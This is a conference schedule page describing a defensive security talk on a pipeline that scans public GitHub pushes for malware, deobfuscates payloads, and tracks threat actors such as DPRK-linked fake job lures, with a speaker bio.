Loading…
← Back to schedule
The Malware Is Coming from Inside the Repo
Saturday September 12, 2026 10:30am - 11:30am CDT
Swissôtel Chicago
GitHub isn't just where developers work. It's where adversaries stage, obfuscate, and deliver malicious code. Every minute, thousands of commits hit public repositories, and buried inside that firehose are credential stealers, reverse shells, crypto drainers, and the occasional nation-state lure dressed up as a coding challenge. The platform's openness, trust, and sheer volume are exactly what make it useful to attackers: free hosting, free CDN, a developer-friendly domain in every allowlist, and a culture where running npm install or cloning a stranger's repo is just Tuesday.

This talk is about what happens when you actually try to watch all of it.

We'll walk through github-threat-scanner, a pipeline that consumes the GitHub public event stream in near real time, pulls down the code behind every push, and runs it through a stack of decoders and detection rules looking for anything that smells wrong. The interesting problems aren't where you'd expect. Ingesting the stream is easy. Storing it is a solved problem. The hard parts are everything in between: peeling back the layers of obfuscation attackers use to hide payloads, deciding what "malicious" even means when half the internet's legitimate code looks suspicious, and keeping false positives low enough that a human analyst can still trust the queue.

We'll dig into the deobfuscation engine (CyberSaucier), a library of CyberChef recipes that chain together XOR bruteforcing, base64 and hex decoding, packed-JavaScript unwrapping, PowerShell de-munging, and the other tricks that turn a wall of gibberish back into something a detection rule can match on. You'll see which recipes earn their keep, which ones we retired because they were pure theatre, and the surprisingly mundane reasons some decoders fail in production that never show up in a blog post.

Then we'll get to the fun part: who's actually out there. Commodity and Nation State actors treat GitHub Pages as disposable infrastructure. And threading through all of it are the targeted operations: DPRK-aligned clusters running fake job interviews and "technical assessments" that ship trojanized projects to developers at crypto firms and long-running personas that maintain plausible commit histories for months before turning hostile.

You'll leave with a concrete picture of how to build this kind of visibility yourself, what the detection surface actually looks like once you're watching it, and why GitHub deserves a seat in your threat model next to email and the browser. If you run a security team, you'll walk out with questions to take back to your developers. If you write detections, you'll have new ideas for where to point them. And if you just like watching adversaries do dumb things at scale, there will be plenty of that too.


The best part of all of this? Most of this data was initially triaged and analyzed by an autonomous AI analyst running in a throwaway VM in dangerous mode, unafraid of touching actual adversary infrastructure.

No prior knowledge of GitHub internals required. Bring opinions about regex.
Speakers
avatar for Justin Borland

Justin Borland

Director of Threat Engineering, Abstract
A proven technical leader in the security industry, Justin started his career with a Canadian Secret clearance while still in College. After graduating, he spent the next decade building custom packet capture systems, intrusion detection systems, logging systems, and DFIR tooling... Read More →
Saturday September 12, 2026 10:30am - 11:30am CDT
Swissôtel Chicago 323 E Wacker Dr, Chicago, IL 60601, USA
  Talk

Sign up or log in to save this to your schedule, view media, leave feedback and see who's attending!

Tweet Share

Get help with the event

Contact event planner Event login
View support guides Find upcoming events
Create an event you'd love to attend!
Explore why organizers choose Sched Success stories
Event App Event scheduling Event registration Event ticketing Sched forms Call for papers Badges Conferences
© 2026. SCHED LLC - All rights reserved - Helping events since 2008
Event Planning Software Privacy Terms
Share Modal

Share this link via

Or copy link